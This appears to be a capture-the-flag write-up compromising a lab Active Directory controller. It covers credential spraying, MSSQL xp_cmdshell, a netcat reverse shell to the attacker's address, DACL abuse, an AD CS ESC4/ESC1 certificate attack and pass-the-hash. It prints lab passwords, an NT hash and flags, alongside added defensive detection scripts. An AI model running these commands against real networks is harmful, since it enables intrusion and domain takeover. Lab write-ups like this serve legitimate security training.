
Nmap Results
# Nmap 7.95 scan initiated Sat Jan 11 23:44:29 2025 as: /usr/lib/nmap/nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt 10.129.172.198
Nmap scan report for 10.129.172.198
Host is up (0.018s latency).
Not shown: 65511 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-12 04:45:45Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-12T04:38:10
|_Not valid after: 2055-01-12T04:38:10
| ms-sql-ntlm-info:
| 10.129.172.198:1433:
| Target_Name: SEQUEL
| NetBIOS_Domain_Name: SEQUEL
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: DC01.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
| ms-sql-info:
| 10.129.172.198:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.sequel.htb
| Not valid before: 2024-06-08T17:35:00
|_Not valid after: 2025-06-08T17:35:00
|_ssl-date: 2025-01-12T04:47:19+00:00; +2s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49718/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
56637/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-12T04:46:43
|_ start_date: N/A
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 11 23:47:17 2025 -- 1 IP address (1 host up) scanned in 168.60 seconds
Looking at the nmap scan output, we can see the hostname DC01.sequel.htb in the output from several ports. Let's get that added to our /etc/hosts file.
echo -e '10.129.185.52\t\tDC01.sequel.htb sequel.htb' | sudo tee -a /etc/hosts
Service Enumeration
TCP/445
smbclient -U 'sequel.htb\rose%KxEPkKe6R8su' -L //DC01.sequel.htb
smbclient -U 'sequel.htb\rose%KxEPkKe6R8su' '//DC01.sequel.htb/Accounting Department'
.xlsx files were not playing well with LibreOffice, so I just searched Google for an online .xlsx viewer and this one worked great. Obviously, don't do this if you're having trouble viewing files with real sensitive data.
TCP/389
LdapDomainDump
Running ldapdomaindump gives a first look at the domain users, computers, and groups, which then helps me identify some potential places to look in the BloodHound data.
ldapdomaindump -u 'sequel.htb\rose' -p 'KxEPkKe6R8su' -o ldd ldap://DC01.sequel.htb
open ldd/domain_users_by_group.html
The ca_svc account may open some avenues for AD CS exploits if we can pivot to this user

sql_svc is configured with a ServicePrincipalName and may be Kerberoastable
Remote BloodHound
bloodhound-python -c All -u 'rose' -p 'KxEPkKe6R8su' -d 'sequel.htb' -ns '10.129.185.52'
Import the .json files into BloodHound for analysis
BloodHound marks the _svc accounts as being Kerberoastable, so it's worth checking if we can crack a hash and pivot from there
Credential Spraying
cat ldd/domain_users.grep | cut -f 3 | grep -vE 'rose|sAMA' > users.txt
Filter out the column header, and rose, whose password we already know


nxc smb DC01.sequel.htb -d sequel.htb -u users.txt -p pw.txt --continue-on-success
Valid credentials found for oscar
The difference from rose is that oscar is a member of the Accounting Department group.
The sa credential came from the accounts.xlsx file, and tcp/1433 is open on the domain controller.
TCP/1433
impacket-mssqlclient 'SEQUEL.HTB/sa:MSSQLP@ssw0rd!'@10.129.185.52
Having sa on the DBMS makes us the database administrator, meaning that we should be able to enable xp_cmdshell.
SQL (sa dbo@master)> enable_xp_cmdshell
Running ipconfig via xp_cmdshell
Exploit
Privileged Credential in SMB Share
Even with low-level access as rose, being able to access the Accounting Department share and discover the accounts.xlsx file allowed us to acquire yet more credentials for testing additional access levels.
Access as oscar was not fruitful, but with tcp/1433 being open externally and having the sa credential for the database, we can easily achieve command execution via the enable_xp_cmdshell helper in Impacket's mssqlclient script.
Host nc.exe over SMB
cp /usr/share/windows-resources/binaries/nc.exe .
Copy nc.exe to the working directory
sudo impacket-smbserver -smb2support -username evil -password evil evilshare .
Host nc.exe over SMB
sudo rlwrap nc -lnvp 443
Start a TCP listener to catch a reverse shell

Steps to map the SMB share using a username and password (as required by modern versions of Windows)
SQL (sa dbo@master)> xp_cmdshell net use Z: \\10.10.14.38\evilshare /user:evil evil
Map the share to the Z: volume
SQL (sa dbo@master)> xp_cmdshell Z:\nc.exe 10.10.14.38 443 -e powershell.exe
Run nc.exe from the mapped share to send a reverse shell back to the listener

Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: DC01
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Primary Domain Controller
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA352
Original Install Date: 6/8/2024, 9:32:20 AM
System Boot Time: 1/13/2025, 12:25:25 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
[02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz
BIOS Version: VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume3
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 2,573 MB
Virtual Memory: Max Size: 5,503 MB
Virtual Memory: Available: 3,855 MB
Virtual Memory: In Use: 1,648 MB
Page File Location(s): C:\pagefile.sys
Domain: sequel.htb
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: Yes
DHCP Server: 10.129.0.1
IP address(es)
[01]: 10.129.185.52
Current User
USER INFORMATION
----------------
User Name SID
============== ============================================
sequel\sql_svc S-1-5-21-548670397-972687484-3496335370-1122
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ =============================================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQL$SQLEXPRESS Well-known group S-1-5-80-3880006512-4290199581-1648723128-3569869737-3631323133 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
SEQUEL\SQLServer2005SQLBrowserUser$DC01 Alias S-1-5-21-548670397-972687484-3496335370-1128 Mandatory group, Enabled by default, Enabled group, Local Group
SEQUEL\SQLRUserGroupSQLEXPRESS Alias S-1-5-21-548670397-972687484-3496335370-1129 Mandatory group, Enabled by default, Enabled group, Local Group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Already documented during pre-exploit enumeration of LDAP.
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.185.52
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
Interesting Files
C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False"
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
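Unattended SQL Server setup files like the one above keep service and sa passwords in clear text. As an added example (not part of the original writeup), this scanner parses such an INI, reports every credential parameter that is set together with the account it belongs to, masks the value so the report is not a second copy of the secret, and checks whether SECURITYMODE="SQL" has enabled the sa login. The INI excerpt and its password values are constructed placeholders.

```python
import configparser

# Constructed excerpt in the shape of the SQL Server unattended-install file
# found on the host (sql-Configuration.INI). Secret values are placeholders.
SAMPLE_INI = """[OPTIONS]
ACTION="Install"
INSTANCENAME="SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\\NETWORK SERVICE"
COMMFABRICNETWORKLEVEL=""0"
SQLSVCACCOUNT="SEQUEL\\sql_svc"
SQLSVCPASSWORD="placeholder-service-password"
SECURITYMODE="SQL"
SAPWD="placeholder-sa-password"
IAcceptSQLServerLicenseTerms=True
"""

# Setup parameters that carry a credential, mapped to the parameter naming
# the account the credential belongs to (SAPWD always belongs to "sa").
SECRET_PARAMS = {
    "SQLSVCPASSWORD": "SQLSVCACCOUNT",
    "AGTSVCPASSWORD": "AGTSVCACCOUNT",
    "RSSVCPASSWORD": "RSSVCACCOUNT",
    "SAPWD": None,
}

def load(ini_text):
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep the original key case
    cp.read_string(ini_text)
    return cp

def option(cp, key):
    """Value of [OPTIONS] key with surrounding quotes stripped, or ""."""
    return cp.get("OPTIONS", key, fallback="").strip().strip('"')

def find_plaintext_secrets(ini_text):
    """Return {param: {"account": ..., "masked": ...}} for each credential
    parameter that is present with a non-empty value."""
    cp = load(ini_text)
    findings = {}
    for key, account_key in SECRET_PARAMS.items():
        value = option(cp, key)
        if not value:
            continue
        account = "sa" if account_key is None else option(cp, account_key)
        findings[key] = {"account": account,
                         "masked": value[:2] + "*" * (len(value) - 2)}
    return findings

def sa_login_enabled(ini_text):
    """SECURITYMODE="SQL" turns on mixed-mode authentication, which is what
    makes the sa login (password from SAPWD) usable over tcp/1433."""
    return option(load(ini_text), "SECURITYMODE").upper() == "SQL"
```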
Privilege Escalation
Password Reuse
Revisiting the interesting file -- C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI -- I noted a password for the sql_svc account. I added the password to my existing list pw.txt and sprayed the credentials using nxc again to see if anything new came of it.
nxc smb DC01.sequel.htb -d 'sequel.htb' -u users.txt -p pw.txt --continue-on-success | grep '+'
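Both sprays above (the first with rose's password, this one with the sql_svc password) leave the same footprint on the DC: a burst of logon events for many different accounts from one source address in a few seconds. As an added example that is not part of the original writeup, this detector runs over a constructed set of Windows Security events (4625 failed logon, 4624 successful logon) and flags sources that touched many accounts inside one window, along with the accounts where the sprayed password actually worked.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security log entries reduced to the fields
# that matter: (timestamp, event id, target account, source address).
# 4625 = failed logon, 4624 = successful logon; other ids are ignored.
SAMPLE_EVENTS = [
    ("2025-01-12T04:50:01", 4625, "Administrator", "10.10.14.38"),
    ("2025-01-12T04:50:01", 4625, "ca_svc",        "10.10.14.38"),
    ("2025-01-12T04:50:02", 4624, "oscar",         "10.10.14.38"),
    ("2025-01-12T04:50:02", 4625, "ryan",          "10.10.14.38"),
    ("2025-01-12T04:50:03", 4625, "sql_svc",       "10.10.14.38"),
    ("2025-01-12T04:50:03", 4672, "oscar",         "10.10.14.38"),
    ("2025-01-12T04:20:00", 4625, "ryan",          "10.129.0.50"),
    ("2025-01-12T04:21:10", 4624, "ryan",          "10.129.0.50"),
]

def detect_spray(events, threshold=5, window=timedelta(minutes=5)):
    """Flag source addresses that attempted at least `threshold` distinct
    accounts inside one `window`, and report which of those accounts
    produced a successful logon (the ones a responder must act on first)."""
    by_src = defaultdict(list)
    for ts, event_id, user, src in events:
        if event_id in (4624, 4625):
            by_src[src].append((datetime.fromisoformat(ts), event_id, user))
    hits = {}
    for src, attempts in by_src.items():
        attempts.sort()
        for i, (start, _, _) in enumerate(attempts):
            in_window = [a for a in attempts[i:] if a[0] - start <= window]
            users = {u for _, _, u in in_window}
            if len(users) >= threshold:
                hits[src] = {
                    "users": sorted(users),
                    "succeeded": sorted({u for _, e, u in in_window if e == 4624}),
                }
                break
    return hits

if __name__ == "__main__":
    for src, info in detect_spray(SAMPLE_EVENTS).items():
        print(f"{src}: sprayed {len(info['users'])} accounts, "
              f"valid password for {info['succeeded'] or 'none'}")
```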
Lateral to Ryan
evil-winrm -i DC01.sequel.htb -u 'ryan' -p 'WqSZAF6CysDQbGb3'
With a session as ryan, we can consider the account pwned, which would make this a good time to revisit BloodHound.
BloodHound shows a WriteOwner DACL to abuse on CA_SVC, which almost certainly smells like AD CS


Abusing WriteOwner
As ryan, we'll use a mix of both Linux and Windows commands to carry out the attack, make us the owner of the ca_svc account, and change the account password to pivot to this user.
impacket-owneredit -action write -new-owner 'ryan' -target 'ca_svc' -dc-ip '10.129.185.52' 'SEQUEL.HTB/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
impacket-dacledit -action write -rights 'FullControl' -principal 'ryan' -target 'ca_svc' -dc-ip '10.129.185.52' 'SEQUEL.HTB/ryan:WqSZAF6CysDQbGb3' 2>/dev/null
This gives us GenericAll over the ca_svc user, allowing us to set the password
net user ca_svc 'P@$$word123!' /domain
To be run on the Windows box via your WinRM session

Lateral to CA_SVC
Enumerating AD CS Vulnerabilities
The name ca_svc is no coincidence; we're certainly meant to enumerate this as a privilege escalation path.
certipy-ad find -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -vulnerable
It goes without saying, but use the password you set on the account


Abusing ESC4
To summarize the ESC4 privilege escalation path:
- The ca_svc account has permission to overwrite the DunderMifflinAuthentication template, as the user is a member of the Cert Publishers group
- Being able to overwrite this template means we can change the configuration to make it vulnerable to ESC1
- Now being vulnerable to ESC1, we can set an arbitrary SAN and use the certificate to authenticate as an administrative user
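The three bullets above are exactly the conditions a template audit should test for. As an added example (not code from the writeup or from Certipy), this checks a template object for the ESC1 preconditions and lists the non-tier-0 principals with write rights (the ESC4 exposure). The two template dicts are a constructed approximation of DunderMifflinAuthentication before and after the edit, with "enroll" and "write" standing in for the ACE principals of its DACL; the flag bits and EKU OIDs are from the AD CS template schema.

```python
# Flag bits and EKU OIDs from the AD CS certificate-template schema.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # msPKI-Enrollment-Flag: manager approval
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}
TIER0 = {"Domain Admins", "Enterprise Admins", "Administrators"}

# Constructed approximation of the template before and after the ESC4 edit;
# "enroll" and "write" stand in for the principals in the template's DACL.
BEFORE = {
    "name": "DunderMifflinAuthentication",
    "msPKI-Certificate-Name-Flag": 0x0,        # subject is built from AD
    "msPKI-Enrollment-Flag": 0x0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll": {"Domain Users"},
    "write": {"Domain Admins", "Cert Publishers"},
}
AFTER = {**BEFORE, "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT}

def esc1_conditions(tmpl):
    """Return which of the five ESC1 preconditions the template meets."""
    met = []
    if tmpl["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject, so any UPN can be put in the SAN")
    ekus = set(tmpl["pKIExtendedKeyUsage"])
    if not ekus or ekus & AUTH_EKUS:       # no EKU at all is also unrestricted
        met.append("certificate is usable for domain authentication")
    if not tmpl["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("no manager approval required")
    if tmpl["msPKI-RA-Signature"] == 0:
        met.append("no authorized signature required")
    if tmpl["enroll"] & LOW_PRIV:
        met.append("low-privileged principals may enroll")
    return met

def is_esc1(tmpl):
    return len(esc1_conditions(tmpl)) == 5

def esc4_writers(tmpl):
    """Non-tier-0 principals that can rewrite the template (ESC4 exposure)."""
    return sorted(tmpl["write"] - TIER0)
```

Before the edit the template already meets four of the five ESC1 conditions, so the single bit the ESC4 write adds is enough; the durable fix is removing Cert Publishers from the template's write ACEs, not just restoring the old configuration.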
You may need to re-run the impacket-owneredit and impacket-dacledit commands and reset the password, due to the scheduled task reverting the changes.
certipy-ad template -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -template 'DunderMifflinAuthentication' -save-old
certipy-ad req -u 'ca_svc' -p 'P@$$word123!' -dc-ip '10.129.185.52' -template 'DunderMifflinAuthentication' -upn 'Administrator@sequel.htb' -ca 'sequel-DC01-CA'
certipy-ad auth -pfx administrator.pfx -domain 'SEQUEL.HTB'
Becoming Domain Admin
Pass the NT Hash
Evil-WinRM
evil-winrm -i DC01.sequel.htb -u Administrator -H 7a8d4e04986afa8ed4060f75e5a0b3ff
impacket-psexec
impacket-psexec -hashes ':7a8d4e04986afa8ed4060f75e5a0b3ff' 'SEQUEL.HTB/Administrator'@10.129.185.52 'powershell.exe'
Flags
User
97490e6d51de3087f000defc13ae94e1
Root
37202fd89d2c4f52170d9ed159081035
